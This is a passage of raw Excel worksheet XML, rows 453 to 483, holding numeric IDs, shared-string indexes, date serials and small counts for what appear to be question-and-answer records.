      </c>
      <c r="M453" s="7">
        <v>4</v>
      </c>
      <c r="N453" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="454" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A454" s="3">
        <v>222902</v>
      </c>
      <c r="B454" s="3" t="s">
        <v>558</v>
      </c>
      <c r="C454" s="9" t="s">
        <v>3088</v>
      </c>
      <c r="D454" s="9" t="s">
        <v>3089</v>
      </c>
      <c r="E454" s="9">
        <v>10755</v>
      </c>
      <c r="F454" s="9" t="s">
        <v>3090</v>
      </c>
      <c r="G454" s="10">
        <v>40455.080555555556</v>
      </c>
      <c r="H454" s="9">
        <v>10755</v>
      </c>
      <c r="I454" s="9" t="s">
        <v>3090</v>
      </c>
      <c r="J454" s="10">
        <v>40455.080555555556</v>
      </c>
      <c r="K454" s="3" t="s">
        <v>559</v>
      </c>
      <c r="L454" s="4">
        <v>4</v>
      </c>
      <c r="M454" s="4">
        <v>2</v>
      </c>
      <c r="N454" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O454" s="3"/>
      <c r="P454" s="3"/>
      <c r="Q454" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="455" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A455" s="9">
        <v>222970</v>
      </c>
      <c r="B455" s="9" t="s">
        <v>1230</v>
      </c>
      <c r="C455" s="9" t="s">
        <v>3091</v>
      </c>
      <c r="D455" s="9" t="s">
        <v>3092</v>
      </c>
      <c r="E455" s="9">
        <v>26004</v>
      </c>
      <c r="F455" s="9" t="s">
        <v>2888</v>
      </c>
      <c r="G455" s="10">
        <v>39879.986805555556</v>
      </c>
      <c r="H455" s="9">
        <v>5640</v>
      </c>
      <c r="I455" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J455" s="10">
        <v>39875.863888888889</v>
      </c>
      <c r="K455" s="9" t="s">
        <v>1231</v>
      </c>
      <c r="L455" s="7">
        <v>5</v>
      </c>
      <c r="M455" s="7">
        <v>3</v>
      </c>
      <c r="N455" s="9" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="456" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A456" s="3">
        <v>223689</v>
      </c>
      <c r="B456" s="3" t="s">
        <v>560</v>
      </c>
      <c r="C456" s="9" t="s">
        <v>3093</v>
      </c>
      <c r="D456" s="9" t="s">
        <v>3094</v>
      </c>
      <c r="E456" s="9">
        <v>50776</v>
      </c>
      <c r="F456" s="9" t="s">
        <v>1788</v>
      </c>
      <c r="G456" s="10">
        <v>41085.895138888889</v>
      </c>
      <c r="H456" s="9">
        <v>1316786</v>
      </c>
      <c r="I456" s="9" t="s">
        <v>3095</v>
      </c>
      <c r="J456" s="10">
        <v>41085.88958333333</v>
      </c>
      <c r="K456" s="3" t="s">
        <v>561</v>
      </c>
      <c r="L456" s="4">
        <v>7</v>
      </c>
      <c r="M456" s="4">
        <v>5</v>
      </c>
      <c r="N456" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O456" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P456" s="3"/>
      <c r="Q456" s="3"/>
    </row>
    <row r="457" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A457" s="3">
        <v>224353</v>
      </c>
      <c r="B457" s="3" t="s">
        <v>614</v>
      </c>
      <c r="C457" s="9" t="s">
        <v>3096</v>
      </c>
      <c r="D457" s="9" t="s">
        <v>3097</v>
      </c>
      <c r="E457" s="9">
        <v>19468</v>
      </c>
      <c r="F457" s="9" t="s">
        <v>2876</v>
      </c>
      <c r="G457" s="10">
        <v>39743.157638888886</v>
      </c>
      <c r="H457" s="9">
        <v>19468</v>
      </c>
      <c r="I457" s="9" t="s">
        <v>2876</v>
      </c>
      <c r="J457" s="10">
        <v>39743.15347222222</v>
      </c>
      <c r="K457" s="3" t="s">
        <v>615</v>
      </c>
      <c r="L457" s="4">
        <v>4</v>
      </c>
      <c r="M457" s="4">
        <v>3</v>
      </c>
      <c r="N457" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O457" s="3"/>
      <c r="P457" s="3"/>
      <c r="Q457" s="3"/>
    </row>
    <row r="458" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A458" s="9">
        <v>224602</v>
      </c>
      <c r="B458" s="9" t="s">
        <v>1232</v>
      </c>
      <c r="C458" s="9" t="s">
        <v>3098</v>
      </c>
      <c r="D458" s="9" t="s">
        <v>3099</v>
      </c>
      <c r="E458" s="9">
        <v>2598</v>
      </c>
      <c r="F458" s="9" t="s">
        <v>2785</v>
      </c>
      <c r="G458" s="10">
        <v>39743.25</v>
      </c>
      <c r="H458" s="9">
        <v>2598</v>
      </c>
      <c r="I458" s="9" t="s">
        <v>2785</v>
      </c>
      <c r="J458" s="10">
        <v>39743.25</v>
      </c>
      <c r="K458" s="9" t="s">
        <v>1233</v>
      </c>
      <c r="L458" s="7">
        <v>3</v>
      </c>
      <c r="M458" s="7">
        <v>1</v>
      </c>
      <c r="N458" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="459" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A459" s="3">
        <v>225983</v>
      </c>
      <c r="B459" s="3" t="s">
        <v>616</v>
      </c>
      <c r="C459" s="9" t="s">
        <v>3100</v>
      </c>
      <c r="D459" s="9" t="s">
        <v>3101</v>
      </c>
      <c r="E459" s="9">
        <v>26628</v>
      </c>
      <c r="F459" s="9" t="s">
        <v>3102</v>
      </c>
      <c r="G459" s="10">
        <v>39756.662499999999</v>
      </c>
      <c r="H459" s="9">
        <v>26628</v>
      </c>
      <c r="I459" s="9" t="s">
        <v>3102</v>
      </c>
      <c r="J459" s="10">
        <v>39756.661805555559</v>
      </c>
      <c r="K459" s="3" t="s">
        <v>617</v>
      </c>
      <c r="L459" s="4">
        <v>6</v>
      </c>
      <c r="M459" s="4">
        <v>4</v>
      </c>
      <c r="N459" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O459" s="3"/>
      <c r="P459" s="3"/>
      <c r="Q459" s="3"/>
    </row>
    <row r="460" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A460" s="9">
        <v>226103</v>
      </c>
      <c r="B460" s="9" t="s">
        <v>1234</v>
      </c>
      <c r="C460" s="9" t="s">
        <v>3103</v>
      </c>
      <c r="D460" s="9" t="s">
        <v>3104</v>
      </c>
      <c r="E460" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F460" s="9" t="s">
        <v>3105</v>
      </c>
      <c r="G460" s="10">
        <v>39743.634027777778</v>
      </c>
      <c r="H460" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="I460" s="9" t="s">
        <v>2442</v>
      </c>
      <c r="J460" s="10">
        <v>39743.631249999999</v>
      </c>
      <c r="K460" s="9" t="s">
        <v>1235</v>
      </c>
      <c r="L460" s="7">
        <v>3</v>
      </c>
      <c r="M460" s="7">
        <v>1</v>
      </c>
      <c r="N460" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="461" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A461" s="3">
        <v>226720</v>
      </c>
      <c r="B461" s="3" t="s">
        <v>636</v>
      </c>
      <c r="C461" s="9" t="s">
        <v>3106</v>
      </c>
      <c r="D461" s="9" t="s">
        <v>3107</v>
      </c>
      <c r="E461" s="9">
        <v>28558</v>
      </c>
      <c r="F461" s="9" t="s">
        <v>2982</v>
      </c>
      <c r="G461" s="10">
        <v>41971.834027777775</v>
      </c>
      <c r="H461" s="9">
        <v>2448960</v>
      </c>
      <c r="I461" s="9" t="s">
        <v>3108</v>
      </c>
      <c r="J461" s="10">
        <v>41968.347222222219</v>
      </c>
      <c r="K461" s="3" t="s">
        <v>637</v>
      </c>
      <c r="L461" s="4">
        <v>3</v>
      </c>
      <c r="M461" s="4">
        <v>1</v>
      </c>
      <c r="N461" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O461" s="3" t="s">
        <v>701</v>
      </c>
      <c r="P461" s="3"/>
      <c r="Q461" s="3"/>
    </row>
    <row r="462" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A462" s="9">
        <v>227037</v>
      </c>
      <c r="B462" s="9" t="s">
        <v>1236</v>
      </c>
      <c r="C462" s="9" t="s">
        <v>3109</v>
      </c>
      <c r="D462" s="9" t="s">
        <v>3110</v>
      </c>
      <c r="E462" s="9">
        <v>96</v>
      </c>
      <c r="F462" s="9" t="s">
        <v>3111</v>
      </c>
      <c r="G462" s="10">
        <v>39743.782638888886</v>
      </c>
      <c r="H462" s="9">
        <v>96</v>
      </c>
      <c r="I462" s="9" t="s">
        <v>3111</v>
      </c>
      <c r="J462" s="10">
        <v>39743.782638888886</v>
      </c>
      <c r="K462" s="9" t="s">
        <v>1237</v>
      </c>
      <c r="L462" s="7">
        <v>6</v>
      </c>
      <c r="M462" s="7">
        <v>4</v>
      </c>
      <c r="N462" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O462" s="9" t="s">
        <v>699</v>
      </c>
      <c r="P462" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q462" s="9" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="463" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A463" s="3">
        <v>228481</v>
      </c>
      <c r="B463" s="3" t="s">
        <v>638</v>
      </c>
      <c r="C463" s="9" t="s">
        <v>3112</v>
      </c>
      <c r="D463" s="9" t="s">
        <v>3113</v>
      </c>
      <c r="E463" s="9">
        <v>13</v>
      </c>
      <c r="F463" s="9" t="s">
        <v>1619</v>
      </c>
      <c r="G463" s="10">
        <v>42202.966666666667</v>
      </c>
      <c r="H463" s="9">
        <v>3728801</v>
      </c>
      <c r="I463" s="9" t="s">
        <v>3114</v>
      </c>
      <c r="J463" s="10">
        <v>42202.376388888886</v>
      </c>
      <c r="K463" s="3" t="s">
        <v>639</v>
      </c>
      <c r="L463" s="4">
        <v>8</v>
      </c>
      <c r="M463" s="4">
        <v>6</v>
      </c>
      <c r="N463" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O463" s="3" t="s">
        <v>698</v>
      </c>
      <c r="P463" s="3"/>
      <c r="Q463" s="3"/>
    </row>
    <row r="464" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A464" s="3">
        <v>228734</v>
      </c>
      <c r="B464" s="3" t="s">
        <v>640</v>
      </c>
      <c r="C464" s="9" t="s">
        <v>3115</v>
      </c>
      <c r="D464" s="9" t="s">
        <v>3116</v>
      </c>
      <c r="E464" s="9">
        <v>3140</v>
      </c>
      <c r="F464" s="9" t="s">
        <v>2683</v>
      </c>
      <c r="G464" s="10">
        <v>41245.133333333331</v>
      </c>
      <c r="H464" s="9">
        <v>-1</v>
      </c>
      <c r="I464" s="9" t="s">
        <v>3117</v>
      </c>
      <c r="J464" s="10">
        <v>41242.631944444445</v>
      </c>
      <c r="K464" s="3" t="s">
        <v>641</v>
      </c>
      <c r="L464" s="4">
        <v>3</v>
      </c>
      <c r="M464" s="4">
        <v>1</v>
      </c>
      <c r="N464" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O464" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P464" s="3" t="s">
        <v>708</v>
      </c>
      <c r="Q464" s="3"/>
    </row>
    <row r="465" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A465" s="3">
        <v>228757</v>
      </c>
      <c r="B465" s="3" t="s">
        <v>642</v>
      </c>
      <c r="C465" s="9" t="s">
        <v>3118</v>
      </c>
      <c r="D465" s="9" t="s">
        <v>3119</v>
      </c>
      <c r="E465" s="9">
        <v>14089</v>
      </c>
      <c r="F465" s="9" t="s">
        <v>3120</v>
      </c>
      <c r="G465" s="10">
        <v>42817.438194444447</v>
      </c>
      <c r="H465" s="9">
        <v>2051454</v>
      </c>
      <c r="I465" s="9" t="s">
        <v>3121</v>
      </c>
      <c r="J465" s="10">
        <v>42816.352083333331</v>
      </c>
      <c r="K465" s="3" t="s">
        <v>643</v>
      </c>
      <c r="L465" s="4">
        <v>4</v>
      </c>
      <c r="M465" s="4">
        <v>2</v>
      </c>
      <c r="N465" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O465" s="3"/>
      <c r="P465" s="3"/>
      <c r="Q465" s="3"/>
    </row>
    <row r="466" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A466" s="9">
        <v>228783</v>
      </c>
      <c r="B466" s="9" t="s">
        <v>1238</v>
      </c>
      <c r="C466" s="9" t="s">
        <v>3122</v>
      </c>
      <c r="D466" s="9" t="s">
        <v>3123</v>
      </c>
      <c r="E466" s="9">
        <v>426671</v>
      </c>
      <c r="F466" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G466" s="10">
        <v>42816.67291666667</v>
      </c>
      <c r="H466" s="9">
        <v>7275984</v>
      </c>
      <c r="I466" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J466" s="10">
        <v>42815.79791666667</v>
      </c>
      <c r="K466" s="9" t="s">
        <v>1239</v>
      </c>
      <c r="L466" s="7">
        <v>6</v>
      </c>
      <c r="M466" s="7">
        <v>4</v>
      </c>
      <c r="N466" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="467" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A467" s="3">
        <v>229567</v>
      </c>
      <c r="B467" s="3" t="s">
        <v>648</v>
      </c>
      <c r="C467" s="9" t="s">
        <v>3124</v>
      </c>
      <c r="D467" s="9" t="s">
        <v>3125</v>
      </c>
      <c r="E467" s="9">
        <v>309308</v>
      </c>
      <c r="F467" s="9" t="s">
        <v>3126</v>
      </c>
      <c r="G467" s="10">
        <v>42448.161111111112</v>
      </c>
      <c r="H467" s="9">
        <v>3902603</v>
      </c>
      <c r="I467" s="9" t="s">
        <v>3127</v>
      </c>
      <c r="J467" s="10">
        <v>42394.287499999999</v>
      </c>
      <c r="K467" s="3" t="s">
        <v>649</v>
      </c>
      <c r="L467" s="4">
        <v>17</v>
      </c>
      <c r="M467" s="4">
        <v>15</v>
      </c>
      <c r="N467" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O467" s="3"/>
      <c r="P467" s="3"/>
      <c r="Q467" s="3"/>
    </row>
    <row r="468" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A468" s="3">
        <v>229658</v>
      </c>
      <c r="B468" s="3" t="s">
        <v>664</v>
      </c>
      <c r="C468" s="9" t="s">
        <v>3128</v>
      </c>
      <c r="D468" s="9" t="s">
        <v>3129</v>
      </c>
      <c r="E468" s="9">
        <v>183172</v>
      </c>
      <c r="F468" s="9" t="s">
        <v>3130</v>
      </c>
      <c r="G468" s="10">
        <v>40516.021527777775</v>
      </c>
      <c r="H468" s="9">
        <v>183172</v>
      </c>
      <c r="I468" s="9" t="s">
        <v>3130</v>
      </c>
      <c r="J468" s="10">
        <v>40512.466666666667</v>
      </c>
      <c r="K468" s="3" t="s">
        <v>665</v>
      </c>
      <c r="L468" s="4">
        <v>3</v>
      </c>
      <c r="M468" s="4">
        <v>1</v>
      </c>
      <c r="N468" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O468" s="3"/>
      <c r="P468" s="3"/>
      <c r="Q468" s="3"/>
    </row>
    <row r="469" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A469" s="9">
        <v>230715</v>
      </c>
      <c r="B469" s="9" t="s">
        <v>1240</v>
      </c>
      <c r="C469" s="9" t="s">
        <v>3131</v>
      </c>
      <c r="D469" s="9" t="s">
        <v>3132</v>
      </c>
      <c r="E469" s="9">
        <v>243245</v>
      </c>
      <c r="F469" s="9" t="s">
        <v>3133</v>
      </c>
      <c r="G469" s="10">
        <v>40458.788888888892</v>
      </c>
      <c r="H469" s="9">
        <v>52458</v>
      </c>
      <c r="I469" s="9" t="s">
        <v>3134</v>
      </c>
      <c r="J469" s="10">
        <v>40458.78125</v>
      </c>
      <c r="K469" s="9" t="s">
        <v>1241</v>
      </c>
      <c r="L469" s="7">
        <v>3</v>
      </c>
      <c r="M469" s="7">
        <v>1</v>
      </c>
      <c r="N469" s="9" t="s">
        <v>705</v>
      </c>
      <c r="O469" s="9" t="s">
        <v>704</v>
      </c>
      <c r="P469" s="9" t="s">
        <v>706</v>
      </c>
    </row>
    <row r="470" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A470" s="9">
        <v>231767</v>
      </c>
      <c r="B470" s="9" t="s">
        <v>1242</v>
      </c>
      <c r="C470" s="9" t="s">
        <v>3135</v>
      </c>
      <c r="D470" s="9" t="s">
        <v>3136</v>
      </c>
      <c r="E470" s="9">
        <v>426671</v>
      </c>
      <c r="F470" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G470" s="10">
        <v>42816.683333333334</v>
      </c>
      <c r="H470" s="9">
        <v>7275984</v>
      </c>
      <c r="I470" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J470" s="10">
        <v>42815.861111111109</v>
      </c>
      <c r="K470" s="9" t="s">
        <v>1243</v>
      </c>
      <c r="L470" s="7">
        <v>33</v>
      </c>
      <c r="M470" s="7">
        <v>31</v>
      </c>
      <c r="N470" s="9" t="s">
        <v>696</v>
      </c>
    </row>
    <row r="471" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A471" s="9">
        <v>232535</v>
      </c>
      <c r="B471" s="9" t="s">
        <v>1244</v>
      </c>
      <c r="C471" s="9" t="s">
        <v>3137</v>
      </c>
      <c r="D471" s="9" t="s">
        <v>3138</v>
      </c>
      <c r="E471" s="9">
        <v>111781</v>
      </c>
      <c r="F471" s="9" t="s">
        <v>3139</v>
      </c>
      <c r="G471" s="10">
        <v>39976.618750000001</v>
      </c>
      <c r="H471" s="9">
        <v>111781</v>
      </c>
      <c r="I471" s="9" t="s">
        <v>3139</v>
      </c>
      <c r="J471" s="10">
        <v>39976.603472222225</v>
      </c>
      <c r="K471" s="9" t="s">
        <v>1245</v>
      </c>
      <c r="L471" s="7">
        <v>3</v>
      </c>
      <c r="M471" s="7">
        <v>1</v>
      </c>
      <c r="N471" s="9" t="s">
        <v>697</v>
      </c>
    </row>
    <row r="472" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A472" s="9">
        <v>232848</v>
      </c>
      <c r="B472" s="9" t="s">
        <v>1246</v>
      </c>
      <c r="C472" s="9" t="s">
        <v>3140</v>
      </c>
      <c r="D472" s="9" t="s">
        <v>3141</v>
      </c>
      <c r="E472" s="9">
        <v>1159478</v>
      </c>
      <c r="F472" s="9" t="s">
        <v>2930</v>
      </c>
      <c r="G472" s="10">
        <v>42676.55</v>
      </c>
      <c r="H472" s="9">
        <v>3682162</v>
      </c>
      <c r="I472" s="9" t="s">
        <v>3142</v>
      </c>
      <c r="J472" s="10">
        <v>42676.531944444447</v>
      </c>
      <c r="K472" s="9" t="s">
        <v>1247</v>
      </c>
      <c r="L472" s="7">
        <v>5</v>
      </c>
      <c r="M472" s="7">
        <v>3</v>
      </c>
      <c r="N472" s="9" t="s">
        <v>702</v>
      </c>
      <c r="O472" s="9" t="s">
        <v>699</v>
      </c>
      <c r="P472" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="473" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A473" s="9">
        <v>233636</v>
      </c>
      <c r="B473" s="9" t="s">
        <v>1248</v>
      </c>
      <c r="C473" s="9" t="s">
        <v>3143</v>
      </c>
      <c r="D473" s="9" t="s">
        <v>3144</v>
      </c>
      <c r="E473" s="9">
        <v>26004</v>
      </c>
      <c r="F473" s="9" t="s">
        <v>2888</v>
      </c>
      <c r="G473" s="10">
        <v>39902.348611111112</v>
      </c>
      <c r="H473" s="9">
        <v>5640</v>
      </c>
      <c r="I473" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J473" s="10">
        <v>39875.886111111111</v>
      </c>
      <c r="K473" s="9" t="s">
        <v>1249</v>
      </c>
      <c r="L473" s="7">
        <v>6</v>
      </c>
      <c r="M473" s="7">
        <v>4</v>
      </c>
      <c r="N473" s="9" t="s">
        <v>708</v>
      </c>
      <c r="Q473" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="474" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A474" s="9">
        <v>235236</v>
      </c>
      <c r="B474" s="9" t="s">
        <v>1250</v>
      </c>
      <c r="C474" s="9" t="s">
        <v>3145</v>
      </c>
      <c r="D474" s="9" t="s">
        <v>3146</v>
      </c>
      <c r="E474" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F474" s="9" t="s">
        <v>3147</v>
      </c>
      <c r="G474" s="10">
        <v>39745.878472222219</v>
      </c>
      <c r="H474" s="9">
        <v>2469</v>
      </c>
      <c r="I474" s="9" t="s">
        <v>3148</v>
      </c>
      <c r="J474" s="10">
        <v>39745.876388888886</v>
      </c>
      <c r="K474" s="9" t="s">
        <v>1251</v>
      </c>
      <c r="L474" s="7">
        <v>3</v>
      </c>
      <c r="M474" s="7">
        <v>1</v>
      </c>
      <c r="N474" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="475" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A475" s="9">
        <v>236129</v>
      </c>
      <c r="B475" s="9" t="s">
        <v>1252</v>
      </c>
      <c r="C475" s="9" t="s">
        <v>3149</v>
      </c>
      <c r="D475" s="9" t="s">
        <v>3150</v>
      </c>
      <c r="E475" s="9">
        <v>426671</v>
      </c>
      <c r="F475" s="9" t="s">
        <v>2170</v>
      </c>
      <c r="G475" s="10">
        <v>42816.675694444442</v>
      </c>
      <c r="H475" s="9">
        <v>7275984</v>
      </c>
      <c r="I475" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J475" s="10">
        <v>42815.833333333336</v>
      </c>
      <c r="K475" s="9" t="s">
        <v>1253</v>
      </c>
      <c r="L475" s="7">
        <v>16</v>
      </c>
      <c r="M475" s="7">
        <v>14</v>
      </c>
      <c r="N475" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="476" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A476" s="9">
        <v>238452</v>
      </c>
      <c r="B476" s="9" t="s">
        <v>1254</v>
      </c>
      <c r="C476" s="9" t="s">
        <v>3151</v>
      </c>
      <c r="D476" s="9" t="s">
        <v>3152</v>
      </c>
      <c r="E476" s="9">
        <v>14089</v>
      </c>
      <c r="F476" s="9" t="s">
        <v>3120</v>
      </c>
      <c r="G476" s="10">
        <v>39747.821527777778</v>
      </c>
      <c r="H476" s="9">
        <v>14089</v>
      </c>
      <c r="I476" s="9" t="s">
        <v>3120</v>
      </c>
      <c r="J476" s="10">
        <v>39747.790277777778</v>
      </c>
      <c r="K476" s="9" t="s">
        <v>1255</v>
      </c>
      <c r="L476" s="7">
        <v>2</v>
      </c>
      <c r="M476" s="7">
        <v>1</v>
      </c>
      <c r="N476" s="9" t="s">
        <v>706</v>
      </c>
      <c r="Q476" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="477" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A477" s="9">
        <v>239278</v>
      </c>
      <c r="B477" s="9" t="s">
        <v>1256</v>
      </c>
      <c r="C477" s="9" t="s">
        <v>3153</v>
      </c>
      <c r="D477" s="9" t="s">
        <v>3154</v>
      </c>
      <c r="E477" s="9">
        <v>305</v>
      </c>
      <c r="F477" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="G477" s="10">
        <v>39748.55972222222</v>
      </c>
      <c r="H477" s="9">
        <v>305</v>
      </c>
      <c r="I477" s="9" t="s">
        <v>1860</v>
      </c>
      <c r="J477" s="10">
        <v>39748.558333333334</v>
      </c>
      <c r="K477" s="9" t="s">
        <v>1257</v>
      </c>
      <c r="L477" s="7">
        <v>4</v>
      </c>
      <c r="M477" s="7">
        <v>2</v>
      </c>
      <c r="N477" s="9" t="s">
        <v>704</v>
      </c>
      <c r="O477" s="9" t="s">
        <v>706</v>
      </c>
      <c r="Q477" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="478" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A478" s="9">
        <v>239395</v>
      </c>
      <c r="B478" s="9" t="s">
        <v>1258</v>
      </c>
      <c r="C478" s="9" t="s">
        <v>3155</v>
      </c>
      <c r="D478" s="9" t="s">
        <v>3156</v>
      </c>
      <c r="E478" s="9">
        <v>31141</v>
      </c>
      <c r="F478" s="9" t="s">
        <v>3157</v>
      </c>
      <c r="G478" s="10">
        <v>41244.939583333333</v>
      </c>
      <c r="H478" s="9">
        <v>32453</v>
      </c>
      <c r="I478" s="9" t="s">
        <v>3158</v>
      </c>
      <c r="J478" s="10">
        <v>40578.008333333331</v>
      </c>
      <c r="K478" s="9" t="s">
        <v>1259</v>
      </c>
      <c r="L478" s="7">
        <v>3</v>
      </c>
      <c r="M478" s="7">
        <v>1</v>
      </c>
      <c r="N478" s="9" t="s">
        <v>704</v>
      </c>
    </row>
    <row r="479" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A479" s="9">
        <v>240171</v>
      </c>
      <c r="B479" s="9" t="s">
        <v>1260</v>
      </c>
      <c r="C479" s="9" t="s">
        <v>3159</v>
      </c>
      <c r="D479" s="9" t="s">
        <v>3160</v>
      </c>
      <c r="E479" s="9">
        <v>2469</v>
      </c>
      <c r="F479" s="9" t="s">
        <v>3148</v>
      </c>
      <c r="G479" s="10">
        <v>39748.702777777777</v>
      </c>
      <c r="H479" s="9">
        <v>2469</v>
      </c>
      <c r="I479" s="9" t="s">
        <v>3148</v>
      </c>
      <c r="J479" s="10">
        <v>39748.690972222219</v>
      </c>
      <c r="K479" s="9" t="s">
        <v>1261</v>
      </c>
      <c r="L479" s="7">
        <v>4</v>
      </c>
      <c r="M479" s="7">
        <v>2</v>
      </c>
      <c r="N479" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="480" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A480" s="9">
        <v>240178</v>
      </c>
      <c r="B480" s="9" t="s">
        <v>1262</v>
      </c>
      <c r="C480" s="9" t="s">
        <v>3161</v>
      </c>
      <c r="D480" s="9" t="s">
        <v>3162</v>
      </c>
      <c r="E480" s="9">
        <v>426671</v>
      </c>
      <c r="F480" s="9" t="s">
        <v>2101</v>
      </c>
      <c r="G480" s="10">
        <v>42816.676388888889</v>
      </c>
      <c r="H480" s="9">
        <v>7275984</v>
      </c>
      <c r="I480" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J480" s="10">
        <v>42815.836111111108</v>
      </c>
      <c r="K480" s="9" t="s">
        <v>1263</v>
      </c>
      <c r="L480" s="7">
        <v>10</v>
      </c>
      <c r="M480" s="7">
        <v>8</v>
      </c>
      <c r="N480" s="9" t="s">
        <v>699</v>
      </c>
    </row>
    <row r="481" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A481" s="9">
        <v>240258</v>
      </c>
      <c r="B481" s="9" t="s">
        <v>1264</v>
      </c>
      <c r="C481" s="9" t="s">
        <v>3163</v>
      </c>
      <c r="D481" s="9" t="s">
        <v>3164</v>
      </c>
      <c r="E481" s="9">
        <v>19038</v>
      </c>
      <c r="F481" s="9" t="s">
        <v>3165</v>
      </c>
      <c r="G481" s="10">
        <v>39777.836111111108</v>
      </c>
      <c r="H481" s="9">
        <v>2469</v>
      </c>
      <c r="I481" s="9" t="s">
        <v>3148</v>
      </c>
      <c r="J481" s="10">
        <v>39748.70208333333</v>
      </c>
      <c r="K481" s="9" t="s">
        <v>1265</v>
      </c>
      <c r="L481" s="7">
        <v>4</v>
      </c>
      <c r="M481" s="7">
        <v>2</v>
      </c>
      <c r="N481" s="9" t="s">
        <v>699</v>
      </c>
      <c r="O481" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="482" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A482" s="9">
        <v>241193</v>
      </c>
      <c r="B482" s="9" t="s">
        <v>1266</v>
      </c>
      <c r="C482" s="9" t="s">
        <v>3166</v>
      </c>
      <c r="D482" s="9" t="s">
        <v>3167</v>
      </c>
      <c r="E482" s="9">
        <v>24181</v>
      </c>
      <c r="F482" s="9" t="s">
        <v>3061</v>
      </c>
      <c r="G482" s="10">
        <v>39748.834722222222</v>
      </c>
      <c r="H482" s="9">
        <v>4086</v>
      </c>
      <c r="I482" s="9" t="s">
        <v>3168</v>
      </c>
      <c r="J482" s="10">
        <v>39748.831944444442</v>
      </c>
      <c r="K482" s="9" t="s">
        <v>1267</v>
      </c>
      <c r="L482" s="7">
        <v>3</v>
      </c>
      <c r="M482" s="7">
        <v>1</v>
      </c>
      <c r="Q482" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="483" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A483" s="9">
        <v>241274</v>
      </c>
      <c r="B483" s="9" t="s">
        <v>1268</v>
      </c>
      <c r="C483" s="9" t="s">
        <v>3169</v>
      </c>
      <c r="D483" s="9" t="s">
        <v>3170</v>
      </c>
      <c r="E483" s="9">
        <v>4575</v>
      </c>
      <c r="F483" s="9" t="s">
        <v>3171</v>
      </c>
      <c r="G483" s="10">
        <v>39748.867361111108</v>
      </c>
      <c r="H483" s="9">
        <v>4575</v>
      </c>
      <c r="I483" s="9" t="s">
        <v>3171</v>
      </c>
      <c r="J483" s="10">
        <v>39748.867361111108</v>
      </c>
      <c r="K483" s="9" t="s">
        <v>1269</v>
      </c>
      <c r="L483" s="7">
        <v>3</v>
      </c>
      <c r="M483" s="7">
        <v>1</v>
      </c>
      <c r="P483" s="9" t="s">
        <v>715</v>
      </c>
